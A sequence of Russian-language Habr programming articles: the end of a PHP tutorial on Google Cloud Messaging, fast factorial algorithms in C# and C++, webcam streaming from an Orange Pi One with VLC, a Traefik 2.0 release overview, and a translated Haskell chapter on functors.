В этом методе перебирается массив переданных классу payload’ов и постепенно наполняется шаблон, созданный в конструкторе, до тех пор пока пакет не превысит лимит в 4096 байт или данные для получателя не закончатся. Кстати, в нашем примере считаем, что один пакет – один получатель. Что это значит? Например, такая условность справедлива когда текстовое сообщение адресовано только одному человеку. Но в групповых беседах одно и тоже сообщение можно отправить несколько людям и GCM это позволяет указав в значении ключа registration\_ids несколько RegistrationId. Но повторюсь, в данном примере во избежание ненужных усложнений этот случай не рассматриваем.
Вернемся к методу getPackages. На самом деле здесь интерес представляет функция isReadyToFlush, которая определяет приведет ли добавление нового json к пакету выход за рамки лимита в 4096 байт. Если да, то пакет тут же завершается и этот json добавляем уже в новый пакет.
**Листинг**
```
/**
* @param GcmPayload[] $payloads
* @return string[]
*/
protected function getPackages($payloads) {
$packages = array();
foreach($payloads as $payload) {
$template = str_replace(self::REGID_PLACEHOLDER, $payload->regId, $this->_template);
$items = '';
foreach($payload->jsons as $json) {
if ($this->isReadyToFlush($items, $json)) {
$package = str_replace(self::ITEMS_PLACEHOLDER, $items, $template);
$packages[] = $package;
$items = '';
}
if ($items) $items .= ','.$json;
else $items = $json;
}
if ($items) { //если есть остатки добавляем их в новый пакет
$package = str_replace(self::ITEMS_PLACEHOLDER, $items, $template);
$packages[] = $package;
}
}
return $packages;
}
```
##### Метод onResponse
Важно не только отправить сообщение, но и понять доставлено ли оно, а если нет то по какой причине. onResponse – это тот колбек, которым мы проинициализировали RollingCurl в методе send. Колбек принимает три параметра:
1. $response – ответ в виде строки
2. $info – результат функции curl\_getinfo [php.net/manual/en/function.curl-getinfo.php](http://php.net/manual/en/function.curl-getinfo.php) и возвращает массив с данными о передаче данных, начиная от http кода ответа и заканчивая скоростями закачки/загрузки. Но в данном туториале интересен лишь http код ответа.
3. RollingCurlRequest $request — информация о запросе. Нас интересует $request->post\_data
Комментарии в листинге функции будут красноречивее:
**Листинг**
```
/**
* @param string $response
* @param array $info
* @param \RollingCurl\RollingCurlRequest $request
*/
public function onResponse($response, $info, RollingCurlRequest $request) {
//Этот флаг показывает успешно ли отправлено сообщение
$success = true;
//Декодирует json, который мы отправили в post
$post = json_decode($request->post_data, true);
if (json_last_error() != JSON_ERROR_NONE) {
//анализируем json ошибку, возможно мы накосячили в синтаксисе.
return;
}
//Получаем RegistratonId и массив с данными
$regId = $post[self::KEY_REG_IDS][0];
$items = $post[self::KEY_DATA][self::KEY_ITEMS];
//получаем код ответа
$code = $info != null && isset($info['http_code']) ? $info['http_code'] : 0;
//Определяем группу кода: 2, 3, 4, 5
$codeGroup = (int)($code / 100);
if ($codeGroup == 5) {
//Если код 5xx, это значит, что GCM сервер временно недоступен, сообщение не доставлено
//TODO Рекомендуется учитывать заголовок Retry-After
$success = false;
}
if ($code !== 200) {
//Ошибочный http код ответа, сообщение не доставлено
//Если требуется более углубленный анализ кодов рекомендую прочитать описание формата ответа http://developer.android.com/google/gcm/gcm.html#response
$success = false;
}
if (!$response || strlen(trim($response)) == null) {
//пустой ответ, значит что-то пошло не так, считаем что сообщение не доставлено.
$success = false;
}
//анализируем ответ, см формат ответа http://developer.android.com/google/gcm/gcm.html#success
if ($response) {
$json = json_decode($response, true);
if (json_last_error() != JSON_ERROR_NONE) {
//ошибка парсинга json ответа, на всякий случай считаем что сообщение не доставлено
$success = false;
$json = array();
}
}
else {
$json = array();
$success = false;
}
// failure содержит количество недоставленных сообщений (в нашем случае получатель один, поэтому failure будет содержать либо 0 либо 1)
$failure = isset($json['failure']) ? $json['failure'] : null;
// canonical_ids содержит количество получателей, для которых нужно обновить RegistrationId (как и в случае с failure - значение либо 0 либо 1).
$canonicalIds = isset($json['canonical_ids']) ? $json['canonical_ids'] : null;
//Если оба параметра равны нулю, то дальнейший анализ результата не требуется. При условии $success=true можно считать что сообщение успешно доставлено
if ($failure || $canonicalIds) {
//results содержит массив объектов. Так как у нас получатель один, то результат тоже будет один (в случае ошибки или смены RegistrationId)
$results = isset($json['results']) ? $json['results'] : array();
foreach($results as $result) {
$newRegId = isset($result['registration_id']) ? $result['registration_id'] : null;
$error = isset($result['error']) ? $result['error'] : null;
if ($newRegId) {
//Заменяем $regId на $newRegId;
//Здесь есть нюанс, смотри Update 1
}
else if ($error) {
if ($error == self::GCM_ERROR_NOTREGISTERED) {
//Удаляем $regId из базы;
}
else {
//Произошла другая ошибка, логируем её
//Если нужно дифференцировать ошибки, то их описание можно найти здесь http://developer.android.com/google/gcm/gcm.html#error_codes
}
$success = false;
}
}
}
//Теперь мы знаем, доставлено ли сообщение для конкретного получателя или нет.
}
```
**Update 1**
[jcrow](https://habrahabr.ru/users/jcrow/) подсказывает в [комментарии](http://habrahabr.ru/post/161305/#comment_5537145) о подводном камне, которой может ждать при обновлении RegistrationId. Ситуация: пользователь удалил приложение и снова установил => повторно зарегистрировался и получил новый RegistrationId. В нашей базе уже две записи для одного и того же пользователя. Причем одна запись со старым RegistrationId, а другая — с новым. Если мы отправляем сообщения на оба RegistrationId, то для старого придет новый RegistrationId. В итоге имеем две записи для одного пользователя с одинаковыми RegistrationId.
В итоге: Если по полю RegistrationId в нашей базе стоит уникальный индекс — получаем ошибку. Если индекса нет — пользователь приложения получает по два одинаковых сообщения каждый раз.
Решение: Как только в onResponse мы получили новый RegistrationId, нужно проверить на его существование в базе. И в положительном случае или удалить одну из записей или смержить обе записи и связанные с ними данные из других таблиц.
##### Что делать дальше?
Например, можно проставить статус в своей базе, что сообщение доставлено. Но нужно помнить, что успешная отправка на GCM сервер еще не значит фактического получения сообщения смартфоном пользователя. Более того, вспомнив пример с отпуском становится понятно, что проставлять статус в onResponse нельзя. Тогда где? У меня есть только один вариант – проставлять статусы при получении данных поллингом. К сожалению, в большинстве случаев это означает, что получатель будет получать одни и те же данные два раза. На уровне приложения можно определять получены ли уже эти данные и если да – игнорировать их. Главный плюс этого подхода – надежность, данные всегда будут доставлены. Минусы – повышенный расход трафика и батареи.
Если вы еще не читали официальную документацию, рекомендую её [к прочтению](http://developer.android.com/guide/google/gcm/index.html).
#### Послесловие
Надеюсь этот туториал не просто станет для кого-нибудь отправной точкой, но и поможет сократить сроки разработки бэкэнда вашего android-приложения. | https://habr.com/ru/post/161305/ | null | ru | null |
# Алгоритмы быстрого вычисления факториала
Понятие факториала известно всем. Это функция, вычисляющая произведение последовательных натуральных чисел от 1 до N включительно: N! = 1 \* 2 \* 3 \*… \* N. Факториал — быстрорастущая функция, уже для небольших значений N значение N! имеет много значащих цифр.
Попробуем реализовать эту функцию на языке программирования. Очевидно, нам понадобиться язык, поддерживающий длинную арифметику. Я воспользуюсь C#, но с таким же успехом можно взять Java или Python.
**Наивный алгоритм**
Итак, простейшая реализация (назовем ее наивной) получается прямо из определения факториала:
```
static BigInteger FactNaive(int n)
{
BigInteger r = 1;
for (int i = 2; i <= n; ++i)
r *= i;
return r;
}
```
На моей машине эта реализация работает примерно 1,6 секунд для N=50 000.
Далее рассмотрим алгоритмы, которые работают намного быстрее наивной реализации.
**Алгоритм вычисления деревом**
Первый алгоритм основан на том соображении, что длинные числа примерно одинаковой длины умножать эффективнее, чем длинное число умножать на короткое (как в наивной реализации). То есть нам нужно добиться, чтобы при вычислении факториала множители постоянно были примерно одинаковой длины.
Пусть нам нужно найти произведение последовательных чисел от L до R, обозначим его как P(L, R). Разделим интервал от L до R пополам и посчитаем P(L, R) как P(L, M) \* P(M + 1, R), где M находится посередине между L и R, M = (L + R) / 2. Заметим, что множители будут примерно одинаковой длины. Аналогично разобьем P(L, M) и P(M + 1, R). Будем производить эту операцию, пока в каждом интервале останется не более двух множителей. Очевидно, что P(L, R) = L, если L и R равны, и P(L, R) = L \* R, если L и R отличаются на единицу. Чтобы найти N! нужно посчитать P(2, N).
Посмотрим, как будет работать наш алгоритм для N=10, найдем P(2, 10):
P(2, 10)
P(2, 6) \* P(7, 10)
( P(2, 4) \* P(5, 6) ) \* ( P(7, 8) \* P(9, 10) )
( (P(2, 3) \* P(4) ) \* P(5, 6) ) \* ( P(7, 8) \* P(9, 10) )
( ( (2 \* 3) \* (4) ) \* (5 \* 6) ) \* ( (7 \* 8) \* (9 \* 10) )
( ( 6 \* 4 ) \* 30 ) \* ( 56 \* 90 )
( 24 \* 30 ) \* ( 5 040 )
720 \* 5 040
3 628 800
Получается своеобразное дерево, где множители находятся в узлах, а результат получается в корне

Реализуем описанный алгоритм:
```
static BigInteger ProdTree(int l, int r)
{
if (l > r)
return 1;
if (l == r)
return l;
if (r - l == 1)
return (BigInteger)l * r;
int m = (l + r) / 2;
return ProdTree(l, m) * ProdTree(m + 1, r);
}
static BigInteger FactTree(int n)
{
if (n < 0)
return 0;
if (n == 0)
return 1;
if (n == 1 || n == 2)
return n;
return ProdTree(2, n);
}
```
Для N=50 000 факториал вычисляется за 0,9 секунд, что почти вдвое быстрее, чем в наивной реализации.
**Алгоритм вычисления факторизацией**
Второй алгоритм быстрого вычисления использует разложение факториала на простые множители (факторизацию). Очевидно, что в разложении N! участвуют только простые множители от 2 до N. Попробуем посчитать, сколько раз простой множитель K содержится в N!, то есть узнаем степень множителя K в разложении. Каждый K-ый член произведения 1 \* 2 \* 3 \*… \* N увеличивает показатель на единицу, то есть показатель степени будет равен N / K. Но каждый K2-ый член увеличивает степень еще на единицу, то есть показатель становится N / K + N / K2. Аналогично для K3, K4 и так далее. В итоге получим, что показатель степени при простом множителе K будет равен N / K + N / K2 + N / K3 + N / K4 +…
Для наглядности посчитаем, сколько раз двойка содержится в 10! Двойку дает каждый второй множитель (2, 4, 6, 8 и 10), всего таких множителей 10 / 2 = 5. Каждый четвертый дает четверку (22), всего таких множителей 10 / 4 = 2 (4 и 8). Каждый восьмой дает восьмерку (23), такой множитель всего один 10 / 8 = 1 (8). Шестнадцать (24) и более уже не дает ни один множитель, значит, подсчет можно завершать. Суммируя, получим, что показатель степени при двойке в разложении 10! на простые множители будет равен 10 / 2 + 10 / 4 + 10 / 8 = 5 + 2 + 1 = 8.
Если действовать таким же образом, можно найти показатели при 3, 5 и 7 в разложении 10!, после чего остается только вычислить значение произведения:
10! = 28 \* 34 \* 52 \* 71 = 3 628 800
Осталось найти простые числа от 2 до N, для этого можно использовать [решето Эратосфена](https://ru.wikipedia.org/wiki/%D0%A0%D0%B5%D1%88%D0%B5%D1%82%D0%BE_%D0%AD%D1%80%D0%B0%D1%82%D0%BE%D1%81%D1%84%D0%B5%D0%BD%D0%B0):
```
static BigInteger FactFactor(int n)
{
if (n < 0)
return 0;
if (n == 0)
return 1;
if (n == 1 || n == 2)
return n;
bool[] u = new bool[n + 1]; // маркеры для решета Эратосфена
List> p = new List>(); // множители и их показатели степеней
for (int i = 2; i <= n; ++i)
if (!u[i]) // если i - очередное простое число
{
// считаем показатель степени в разложении
int k = n / i;
int c = 0;
while (k > 0)
{
c += k;
k /= i;
}
// запоминаем множитель и его показатель степени
p.Add(new Tuple(i, c));
// просеиваем составные числа через решето
int j = 2;
while (i \* j <= n)
{
u[i \* j] = true;
++j;
}
}
// вычисляем факториал
BigInteger r = 1;
for (int i = p.Count() - 1; i >= 0; --i)
r \*= BigInteger.Pow(p[i].Item1, p[i].Item2);
return r;
}
```
Эта реализация также тратит примерно 0,9 секунд на вычисление 50 000!
**Библиотека GMP**
Как справедливо отметил
[pomme](http://habrahabr.ru/users/pomme/) скорость вычисления факториала на 98% зависит от скорости умножения. Попробуем протестировать наши алгоритмы, реализовав их на C++ с использованием библиотеки [GMP](https://gmplib.org/). Результаты тестирования приведены ниже, по ним получается что алгоритм умножения в C# имеет довольно странную асимптотику, поэтому оптимизация дает относительно небольшой выигрыш в C# и огромный в C++ с GMP. Однако этому вопросу вероятно стоит посвятить отдельную статью.
**Сравнение производительности**
Все алгоритмы тестировались для N равном 1 000, 2 000, 5 000, 10 000, 20 000, 50 000 и 100 000 десятью итерациями. В таблице указано среднее значение времени работы в миллисекундах.

График с линейной шкалой

График с логарифмической шкалой

**Идеи и алгоритмы из комментариев**
Хабражители предложили немало интересных идей и алгоритмов в ответ на мою статью, здесь я оставлю ссылки на лучшие из них
[lany](http://habrahabr.ru/users/lany/) [распараллелил дерево на Java с помощью Stream API и получил ускорение в 18 раз](http://habrahabr.ru/post/255813)
[Mrrl](http://habrahabr.ru/users/mrrl/) [предложил оптимизацию факторизации на 15-20%](http://habrahabr.ru/post/255761/#comment_8376127)
[PsyHaSTe](http://habrahabr.ru/users/psyhaste/) [предложил улучшение наивной реализации](http://habrahabr.ru/post/255761/#comment_8376215)
[Krypt](http://habrahabr.ru/users/krypt/) [предложил распараллеленную версию на C#](http://habrahabr.ru/post/255761/#comment_8376369)
[SemenovVV](http://habrahabr.ru/users/semenovvv/) [предложил реализацию на Go](http://habrahabr.ru/post/255761/#comment_8377375)
[pomme](http://habrahabr.ru/users/pomme/) [предложил использовать GMP](http://habrahabr.ru/post/255761/#comment_8377385)
[ShashkovS](http://habrahabr.ru/users/shashkovs/) [предложил быстрый алгоритм на Python](http://habrahabr.ru/post/255761/#comment_8379739)
**Исходные коды**
Исходные коды реализованных алгоритмов приведены под спойлерами
**C#**
```
using System;
using System.Linq;
using System.Text;
using System.Numerics;
using System.Collections.Generic;
using System.Collections.Specialized;
namespace BigInt
{
class Program
{
static BigInteger FactNaive(int n)
{
BigInteger r = 1;
for (int i = 2; i <= n; ++i)
r *= i;
return r;
}
static BigInteger ProdTree(int l, int r)
{
if (l > r)
return 1;
if (l == r)
return l;
if (r - l == 1)
return (BigInteger)l * r;
int m = (l + r) / 2;
return ProdTree(l, m) * ProdTree(m + 1, r);
}
static BigInteger FactTree(int n)
{
if (n < 0)
return 0;
if (n == 0)
return 1;
if (n == 1 || n == 2)
return n;
return ProdTree(2, n);
}
static BigInteger FactFactor(int n)
{
if (n < 0)
return 0;
if (n == 0)
return 1;
if (n == 1 || n == 2)
return n;
bool[] u = new bool[n + 1];
List> p = new List>();
for (int i = 2; i <= n; ++i)
if (!u[i])
{
int k = n / i;
int c = 0;
while (k > 0)
{
c += k;
k /= i;
}
p.Add(new Tuple(i, c));
int j = 2;
while (i \* j <= n)
{
u[i \* j] = true;
++j;
}
}
BigInteger r = 1;
for (int i = p.Count() - 1; i >= 0; --i)
r \*= BigInteger.Pow(p[i].Item1, p[i].Item2);
return r;
}
static void Main(string[] args)
{
int n;
int t;
Console.Write("n = ");
n = Convert.ToInt32(Console.ReadLine());
t = Environment.TickCount;
BigInteger fn = FactNaive(n);
Console.WriteLine("Naive time: {0} ms", Environment.TickCount - t);
t = Environment.TickCount;
BigInteger ft = FactTree(n);
Console.WriteLine("Tree time: {0} ms", Environment.TickCount - t);
t = Environment.TickCount;
BigInteger ff = FactFactor(n);
Console.WriteLine("Factor time: {0} ms", Environment.TickCount - t);
Console.WriteLine("Check: {0}", fn == ft && ft == ff ? "ok" : "fail");
}
}
}
```
**C++ с GMP**
```
#include
#include
#include
#include
#include
using namespace std;
mpz\_class FactNaive(int n)
{
mpz\_class r = 1;
for (int i = 2; i <= n; ++i)
r \*= i;
return r;
}
mpz\_class ProdTree(int l, int r)
{
if (l > r)
return 1;
if (l == r)
return l;
if (r - l == 1)
return (mpz\_class)r \* l;
int m = (l + r) / 2;
return ProdTree(l, m) \* ProdTree(m + 1, r);
}
mpz\_class FactTree(int n)
{
if (n < 0)
return 0;
if (n == 0)
return 1;
if (n == 1 || n == 2)
return n;
return ProdTree(2, n);
}
mpz\_class FactFactor(int n)
{
if (n < 0)
return 0;
if (n == 0)
return 1;
if (n == 1 || n == 2)
return n;
vector u(n + 1, false);
vector > p;
for (int i = 2; i <= n; ++i)
if (!u[i])
{
int k = n / i;
int c = 0;
while (k > 0)
{
c += k;
k /= i;
}
p.push\_back(make\_pair(i, c));
int j = 2;
while (i \* j <= n)
{
u[i \* j] = true;
++j;
}
}
mpz\_class r = 1;
for (int i = p.size() - 1; i >= 0; --i)
{
mpz\_class w;
mpz\_pow\_ui(w.get\_mpz\_t(), mpz\_class(p[i].first).get\_mpz\_t(), p[i].second);
r \*= w;
}
return r;
}
mpz\_class FactNative(int n)
{
mpz\_class r;
mpz\_fac\_ui(r.get\_mpz\_t(), n);
return r;
}
int main()
{
int n;
unsigned int t;
cout << "n = ";
cin >> n;
t = clock();
mpz\_class fn = FactNaive(n);
cout << "Naive: " << (clock() - t) \* 1000 / CLOCKS\_PER\_SEC << " ms" << endl;
t = clock();
mpz\_class ft = FactTree(n);
cout << "Tree: " << (clock() - t) \* 1000 / CLOCKS\_PER\_SEC << " ms" << endl;
t = clock();
mpz\_class ff = FactFactor(n);
cout << "Factor: " << (clock() - t) \* 1000 / CLOCKS\_PER\_SEC << " ms" << endl;
t = clock();
mpz\_class fz = FactNative(n);
cout << "Native: " << (clock() - t) \* 1000 / CLOCKS\_PER\_SEC << " ms" << endl;
cout << "Check: " << (fn == ft && ft == ff && ff == fz ? "ok" : "fail") << endl;
return 0;
}
``` | https://habr.com/ru/post/255761/ | null | ru | null |
# Онлайн видеостриминг с платы Orange Pi One

В данном посте будет приведён пример реализации онлайн видеостриминга с помощью вебкамеры и одноплатника Orange Pi One.
Ну начнём с того, что здесь используется:
1) [Платка](https://ru.aliexpress.com/item/Orange-Pi-One-ubuntu-linux-and-android-mini-PC-Beyond-and-Compatible-with-Raspberry-Pi-2/32603308880.html) с картинки
2) [Вебкамера](https://ru.aliexpress.com/item/50-MP-HD-Camera-USB-Webcam-rotator-for-Laptop-Desktop-PC-Computer/32764372984.html)
А это 810+155 = 965р.- т.е. это может себе позволить даже школьник.
Итак стриминг это вещание контента в сеть. Т.е. нужен сервер который будет раздавать информационный поток. Раздавать можно широковещательно либо по запросу. В нашем случае будет по запросу.
Сперва нужно проверить- поднимается ли драйвер камеры:
```
opigaz@orangepione:~$ lsusb
...
Bus 002 Device 002: ID 1908:2311 GEMBIRD
...
```
Камера подхватилась. Теперь попробуем сделать снимок камеры. Я пошёл лёгким путём и поставил библиотеку OpenCV:
```
opigaz@orangepione:~$ sudo apt install python-opencv
```
Нашёл в интернете пример:
```
import cv2
import numpy
cap = cv2.VideoCapture(0) #ignore the errors
cap.set(3, 960) #Set the width important because the default will timeout
#ignore the error or false response
cap.set(4, 544) #Set the height ignore the errors
r, frame = cap.read()
cv2.imwrite("photo.jpg", frame)
```
И сделал первый снимок:
```
opigaz@orangepione:~$ python cam.py
```

Не очень картинка получилась, но котакт есть! Также можно использовать напрямую API «video for Linux» для получения изображения с камеры.
Для стриминга нужно организовать раздающий сервер. Для этого потребуется существенно больше времени, т.к. помимо всего прочего нужно имплементировать поддержку какого-либо формата раздачи (а лучше нескольких). И, тем более, есть готовые решения. Я поставил ffmpeg и vlc, соответственно.
Чтобы запустить сервер можно использовать эту комманду:
```
cvlc v4l2:///dev/video0 :v4l2-standard=mpeg2 :input-slave=alsa://hw:0,0 :live-caching=300 :sout="#transcode{vcodec=WMV2,vb=800,scale=1,acodec=wma2,ab=128,channels=2,samplerate=44100}:http{dst=:8080/stream.wmv}"
```
А чтобы проверить видеопоток на клиенте можно сделать вот так:
```
vlc -vvv http://192.168.100.10:8080/stream.wmv
```
Железная часть выглядит так:

А результат таков:

Также к этому потоку можно подключаться и с мобильных устройств. Я пробовал со своего смартфона с установленным на нём vlc.
**PS:** Для меня самым удивительным было, что и камера и платка работают. Причём загрузка платы примерно такова во время вещания:

**PPS:** Жаль, что мою прошлую публикацию выпилили. Хотел донести народу, что даже студент может себе позволить взять дешманскую железку и она будет работать. | https://habr.com/ru/post/328892/ | null | ru | null |
# Traefik 2.0: обновление service mesh с поддержкой TCP и новым веб-интерфейсом
В минувший вторник компания Containous [представила](https://blog.containo.us/traefik-2-0-6531ec5196c2) крупное обновление к своему флагманскому Open Source-продукту — service mesh-решению Traefik — в виде версии 2.0.

Главным новшеством в Traefik 2.0 стало появление **поддержки протокола TCP**. В случае шифрования по TLS для маршрутизации используются данные [SNI](https://en.wikipedia.org/wiki/Server_Name_Indication) (Server Name Indication). Примечательная особенность — возможность работы с entrypoint сразу по двум протоколам: HTTP и TCP — на одном и том же порту. Иллюстрация этой фичи:
```
tcp:
routers:
to-db-1:
entrypoints:
- web-secure
rule: "HostSNI(`db1.domain`)"
service: "db-1"
tls: {}
http:
routers:
to-db1-dashboard:
entrypoints:
- web-secure
rule: "Host(`dashboard.db1.domain`)"
service: "db1-dashboard"
tls: {}
```
*В этом примере HTTP-запросы к `dashboard.db1.domain` направляются на веб-сервис управления базой данных, а TCP к `db1.domain` — на сервис самой СУБД.*
Среди прочих значимых изменений в релизе Traefik 2.0:
* поддержка так называемых [**middleware**](https://docs.traefik.io/v2.0/middlewares/overview/) — промежуточных звеньев для запросов, суть которых сводится к возможности проводить специальные операции над запросами до того, как они попадают в сервис (или перед тем, как ответ сервиса отправляется клиентам). Примеры таких операций, названия которых говорят за себя: BasicAuth, Compress, Headers, RateLimit… Часто используемые совместно middleware можно объединять в цепочки *(chains)*;

* **новый веб-интерфейс** (WebUI) для просмотра информации о кластере и управления настройками Traefik;

* поддержка **канареечных выкатов** ([canary deployments](https://martinfowler.com/bliki/CanaryRelease.html)) и, соответственно, возможности A/B-тестирования, что реализовано в виде [Service Load Balancers](https://docs.traefik.io/v2.0/routing/services/#servers-load-balancer), перенаправляющих запросы к сервисам приложения;
* поддержка **зеркалирования запросов** для дублирования одного и того же входящего трафика на различные сервисы (тоже реализовано в [Service Load Balancers](https://docs.traefik.io/v2.0/routing/services/#mirroring-service));

* конфигурация для Kubernetes в виде [CRD](https://docs.traefik.io/v2.0/reference/dynamic-configuration/kubernetes-crd/);
* альтернативный формат конфигурации в YAML.
Полный список изменений — см. в [GitHub-репозитории проекта](https://github.com/containous/traefik/releases/tag/v2.0.0).
P.S.
----
Читайте также в нашем блоге:
* «[Maesh — новый простой service mesh для Kubernetes от авторов Traefik](https://habr.com/ru/company/flant/news/t/466627/)»;
* «Назад к микросервисам вместе с Istio»: [часть 1 (знакомство с основными возможностями)](https://habr.com/ru/company/flant/blog/438426/), [часть 2 (управление трафиком)](https://habr.com/ru/company/flant/blog/440378/), [часть 3 (аутентификация и авторизация)](https://habr.com/ru/company/flant/blog/443668/);
* «[Conduit — легковесный service mesh для Kubernetes](https://habr.com/ru/company/flant/blog/349496/)»;
* «[Что такое service mesh и почему он мне нужен [для облачного приложения с микросервисами]?](https://habr.com/ru/company/flant/blog/327536/)». | https://habr.com/ru/post/468029/ | null | ru | null |
# Изучай Хаскель ради добра! Аппликативные функторы
Совсем недавно издательство *No Starch Press* подготовило и [выпустило](http://nostarch.com/lyah.htm) печатное издание замечательного учебника [Learn You a Haskell for Great Good!](http://learnyouahaskell.com) (онлайн-версия), написанного Miran Lipovača.
Я хочу представить вам самый актуальный перевод главы 11 *Аппликативные функторы*, оригиналом для которого послужило именно издание от *No Starch Press*, адаптированное для печати.
Аппликативные функторы
======================
Сочетание чистоты, функций высшего порядка, параметризованных алгебраических типов данных и классов типов в Хаскеле делает реализацию полиморфизма более простой, чем в других языках. Нам не нужно думать о типах, принадлежащих к большой иерархии. Вместо этого мы рассматриваем, как могут действовать типы, а затем связываем их с помощью подходящих классов типов. `Int` может вести себя как множество сущностей — сравниваемая сущность, упорядочиваемая сущность, перечислимая сущность и т. д.
Классы типов открыты, что означает, что мы можем определить собственный тип данных, обдумать, как он может действовать, и связать его с классами типов, которые определяют его поведения. Мы также можем ввести новый класс типов, а затем сделать уже существующие типы его экземплярами. По этой причине и благодаря прекрасной системе типов Хаскеля, которая позволяет нам знать многое о функции только по ее объявлению типа, мы можем определять классы типов, которые описывают очень общее и абстрактное поведение.
Мы говорили о классах типов, которые определяют операции для проверки того, равны ли два элемента, и сравнения двух элементов по размещению их в каком-то порядке. Это очень абстрактные и элегантные поведения, хотя мы не думаем о них как о чем-то очень особенном, поскольку мы имели с ними дело большую часть нашей жизни. В главе 7 были введены функторы, которые являются типами, чьи значения можно отобразить. Это пример полезного и все ещё довольно абстрактного свойства, которое могут описать классы типов. В этой главе мы ближе познакомимся с функторами, а также — с немного более сильными и более полезными версиями функторов, которые имеют название аппликативные функторы.
Функторы возвращаются
---------------------
Как вы узнали из главы 7, функторы — это сущности, которые можно отобразить, как, например, списки, значения `Maybe`, и деревья. В Хаскеле они описываются классом типов `Functor`, содержащим только один метод класса типов: `fmap`. `fmap` имеет тип `fmap :: (a -> b) -> f a -> f b`, который говорит, «Дайте мне функцию, которая принимает a и возвращает b и коробку, содержащую a (или несколько a) внутри, и я верну коробку с `b` (или несколькими `b`) внутри.» Она применяет функцию к элементу внутри коробки.
Мы также можем воспринимать значения функторов как значения с добавочным контекстом. Например, значения `Maybe`обладают дополнительным контекстом того, что вычисления могли окончиться неуспешно. По отношению к спискам контекстом является то, что значение может быть множественным, либо отсутствовать. `fmap` применяет функцию к значению, сохраняя его контекст.
Если мы хотим сделать конструктор типа экземпляром `Functor`, он должен иметь вид `* -> *`, что значит, что он принимает ровно один конкретный тип в качестве параметра типа. Например, `Maybe` может быть сделан экземпляром, так как он получает один параметр типа для произведения конкретного типа, как, например, `Maybe Int` или `Maybe String`. Если конструктор типа принимает два параметра, как `Either,` мы должны частично применять конструктор типа до тех пор, пока он не будет принимать только один параметр. Поэтому мы не можем написать `Functor Either where`, но мы можем написать `Functor (Either a) where`. Затем если бы мы вообразили, что `fmap` предназначена только для работы с `Either a`, она имела бы следующее описание типа:
```
fmap :: (b -> c) -> Either a b -> Either a c
```
Как вы видите, часть `Either a` фиксирована, потому что `Either a` принимает только один параметр типа.
### Действия ввода-вывода в качестве функторов
К настоящему моменту вы изучили, каким образом многие типы (если быть точным, конструкторы типов) являются экземплярами `Functor`: `[]` и `Maybe`, `Either a`, а также тип `Tree`, который мы создали в главе 7. Вы видели, как вы можете отображать их с помощью функций ради добра. Теперь давайте взглянем на экземпляр `IO`.
Если какое-то значение имеет, скажем, тип `IO String`, это означает, что оно является действием ввода-вывода, которое выйдет в реальный мир и получит какую-то строку для нас, которую оно затем вернет в качестве результата. Мы можем использовать `<-` в синтаксисе do для привязывания этого результата к имени. В главе 8 мы говорили о том, как действия ввода-вывода похожи на коробки с маленькими ножками, которые выходят наружу и получают для нас какое-то значение из внешнего мира. Мы можем посмотреть, что они принесли, но после просмотра нам необходимо обернуть значение обратно в `IO`. Рассматривая эту аналогию коробок на ножках, вы можете понять, каким образом `IO` действует как функтор.
Давайте посмотрим, каким образом `IO`является экземпляром `Functor`. Когда мы используем `fmap` для отображения действия ввода-вывода с помощью функции, мы хотим обратно получить действие ввода-вывода, которое делает то же самое, но к его результирующему значению применяется наша функция. Вот он код:
```
instance Functor IO where
fmap f action = do
result <- action
return (f result)
```
Результатом отображения действия ввода-вывод с помощью чего-либо будет действие ввода-вывода, так что мы сразу же используем синтаксис `do` для склеивания двух действий и создания одного нового. В реализации для `fmap` мы создаем новое действие ввода-вывода, которое сначала выполняет первоначальное действие ввода-вывода, давая результату имя `result`. Затем мы выполняем `return (f result)`. Вспомните, что `return` — это функция, создающая действие ввода-вывода, которое ничего не делает, а только возвращает что-либо в качестве своего результата.
Действие, которое производит блок `do`, будет всегда возвращать результирующее значение своего последнего действия. Вот почему мы используем `return`, чтобы создать действие ввода-вывода, которое в действительности ничего не делает, а просто возвращает `f result` в качестве результата нового действия ввода-вывода. Взгляните на этот кусок кода:
```
main = do line <- getLine
let line' = reverse line
putStrLn $ "You said " ++ line' ++ " backwards!"
putStrLn $ "Yes, you really said" ++ line' ++ " backwards!
```
У пользователя запрашивается строка, и мы отдаем ее обратно пользователю, но в перевернутом виде. А вот как можно переписать это с использованием `fmap`:
```
main = do line <- fmap reverse getLine
putStrLn $ "You said " ++ line ++ " backwards!"
putStrLn $ "Yes, you really said" ++ line ++ " backwards!"
```
 Так же, как мы можем отобразить `Just "blah"` с помощью `fmap reverse`, получая `Just "halb"`, мы можем отобразить `getLine` с помощью `fmap reverse`. `getLine` — это действие ввода-вывода, которое имеет тип `IO String` и отображение его с помощью `reverse` дает нам действие ввода-вывода, которое выйдет в реальный мир и получит строку, а затем применит `reverse` к своему результату. Таким же образом, как мы можем применить функцию к тому, что находится внутри коробки `Maybe`, мы можем применить функцию к тому, что находится внутри коробки `IO`, но она должна выйти в реальный мир, чтобы получить что-либо. Затем, когда мы привязываем результат к имени, используя `<-`, имя будет отражать результат, к которому уже применена `reverse`.
Операция ввода-вывода `fmap (++"!") getLine` ведет себя в точности как `getLine`, за исключением того, что к ее результату всегда добавляется `"!"` в конец!
Если бы `fmap` работала только с `IO`, она имела бы тип `fmap :: (a -> b) -> IO a -> IO b`. `fmap` принимает функцию и операцию ввода-вывода, и возвращает новую операцию ввода-вывода, похожую на старую, за исключением того, что к результату, содержащемуся в ней, применяется функция.
Если вы когда-нибудь окажетесь в ситуации, когда вы связываете результат операции ввода-вывода с именем лишь для того, чтобы применить к нему функцию, а затем даете очередному результату какое-то другое имя, подумайте над использованием `fmap`. Если вы хотите применить несколько функций к каким-то данным внутри функтора, вы можете объявить свою функцию на верхнем уровне, создать лямбда-функцию или, в идеале, использовать композицию функций:
```
import Data.Char
import Data.List
main = do line <- fmap (intersperse '-' . reverse . map toUpper) getLine
putStrLn line
```
Вот что произойдет, если мы запустим этот код и введем hello there:
```
$ runhaskell fmapping_io
hello there
E-R-E-H-T- -O-L-L-E-H
```
Функция `intersperse '-' . reverse . map toUpper` берет строку, отображает ее с помощью `toUpper`, применяет `reverse` к этому результату, а затем применяет к этому результату `intersperse '-'`. Это является более красивым способом записи следующего кода:
`(\xs -> intersperse '-' (reverse (map toUpper xs)))`
### Функции в качестве функторов
